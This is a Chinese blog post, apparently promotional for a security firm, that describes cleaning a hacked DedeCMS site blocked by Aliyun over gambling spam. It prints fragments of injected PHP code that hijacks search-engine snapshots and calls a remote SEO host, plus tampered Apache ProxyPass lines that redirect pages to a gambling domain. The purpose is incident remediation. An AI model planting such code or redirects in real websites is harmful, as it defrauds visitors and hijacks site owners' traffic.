Sine安全-网络安全背后的巨人,提供服务器安全_服务器维护_网站安全解决方案

CDN网站违规URL屏蔽访问处理通知 该如何解决?



         2018年1月8号一大早收到阿里云的邮件以及短信提醒大体内容是说:违规URL屏蔽访问通

知,立即登录阿里云官方,进账户面板查看信息,发现阿里云消息有很多条未读的,都是关于网

站被屏蔽访问的通知。点击查看详情如下图:

 
 
您的CDN网站URL:http://www.******.net/k/cilrq/90070.htm涉及违法不良信息,违反了相关

服务协议和《互联网信息服务管理办法》第十五条规定,目前阿里云已对您的违法URL做屏

蔽访问处理。如果您对本通知的内容存有疑问,请及时工单或者电话联系我们,谢谢您对阿

里云的支持。

 
 
 
重点关注自2017年1月10日起,阿里云业务安全团队将执行监管政策针对网民举报或者监管下发7

天累计超过100个违法页面的网站进行升级处罚。

 
 
处罚标准如下:
 
第一次(7天累计违规网页达100条) 阻断域名  完全整改、公安平台提交备案、参加网站安全管

理考试及培训
 
第二次 (7天累计违规网页达100条) 阻断域名且1年内禁止参加阿里云平台营销活动。 完全整

改、公安平台成功备案、参加网站安全管理考试及培训。
 
第三次 (7天累计违规网页达100条)阻断域名,账号禁止购买且永不开通。
 
还有一个阿里云的屏蔽通知是URL禁止访问 您存在国家法律法规规定严禁买卖或传播的商品,如

下图所示:说是我网站存在一些非法的信息,国家不允许的。

 
网站被阿里云违规URL屏蔽访问处理通知,那么该如何解决这个问题?首先我第一想到的就是网站

有可能被黑客篡改了,看了下自己的网站在百度的收录情况,发现了问题,百度收录了许多与我们

网站不相关内容的信息,什么博彩,以及娱乐城等的网页快照,从百度点击进去直接跳转到博彩网

站上去,360直接拦截并提示为:未经证实的博彩赌博网站,您访问的网站含有未证实的境外博彩

或非法赌博的相关内容,可能给您造成财产上的损失,请您谨慎访问。

 
很无语,网站都运行一年多了,都没有被黑客攻击过,这次是彻底的碰到了,既然问题发生了,那

就勇敢的面对去解决问题,我的判断是网站程序代码里被植入了恶意木马病毒代码,于是连接FTP

把网站程序都下载到自己的电脑上,一行一行代码的进行查看,看的眼都花了,在数据库配置文件

里发现了问题。有一段加密的代码在里面:
 
@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F5570
 
6C6F616432F506963747572652F323031362D31312D31312F30'));
 
function parse_name($name, $type=0)
 
?php
 
set_time_limit(20);error_reporting(0);
 
define('u_b','/');
 
define('s_u','http://seo.seoso8.com/');
 
define('s_s','@haosou.com|360.cn|360spider|
 
so|360|sogou|baidu|youdao@i');
 
define('h_t',$_SERVER['SERVER_NAME']);define
 
('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP
 
_USER_AGENT']);define('h_z',s_p());
 
从上面代码可以看出,这个一个劫持百度快照的代码,劫持360,以及百度,搜狗等搜索引擎的一

个木马代码。删除掉以上代码,然后从百度点击进去,网站没有再跳转,看来问题的根本在这里。

本以为彻底的解决了问题,再从百度点击其他页面,又出现了跳转,欲哭无泪,这个黑客好高级,

干嘛要这么整我的网站啊。(后来咨询了很多安全行业的大牛,才知道,黑客利用我网站在百度

上的权重,进行百度快照劫持,导致我网站收录一些博彩的快照,以利于黑客的博彩关键词在百

度的排名)

 
 
对服务器的环境我也进行了详细的检查与审计,发现apache的配置文件http.conf 也被篡改了,代

码如下:

 
Proxypass /k(.) http://123.z7y.cc/
 
ProxypassMatch /k(.) http://123.z7y.cc/
 
打开上面的网址,直接跳转到了博彩网站上去了,去掉上面的代码网站恢复了正常。立即提交阿里

云的工单,告诉阿里云的技术,已经解决了网站违规的内容,请尽快解除网站的屏蔽,让网站恢复

正常访问。 不到2小时,阿里云技术回复了,已经解除对网站的屏蔽访问,至此网站违规URL屏蔽

访问处理通知,已得到彻底的解决
。那么网站为何被篡改? 大部分是由于网站存在漏洞,我用的

是dedecms织梦系统,系统以前一直没升级更新过,导致以前的版本存在漏洞,网站才被黑客攻

击。现在网站已经升级到最新版本,没有再出现被篡改的情况。希望以上我的处理过程以及办法,

能帮到更多和我一样遇到这个情况的人。
 
 
(很多哥们也遇到了这个问题,加了我好友,并且描述了他们遇到的情况,有些是比较复杂的,

如果自己对网站代码不是太懂的话,建议找专业的网站安全公司来处理,国内像SINE安全公司、

绿盟安全公司、都是比较不错的,阿里云那面我也咨询了相关的解决方案,阿里云也是建议找

第三方安全公司处理。)
分享: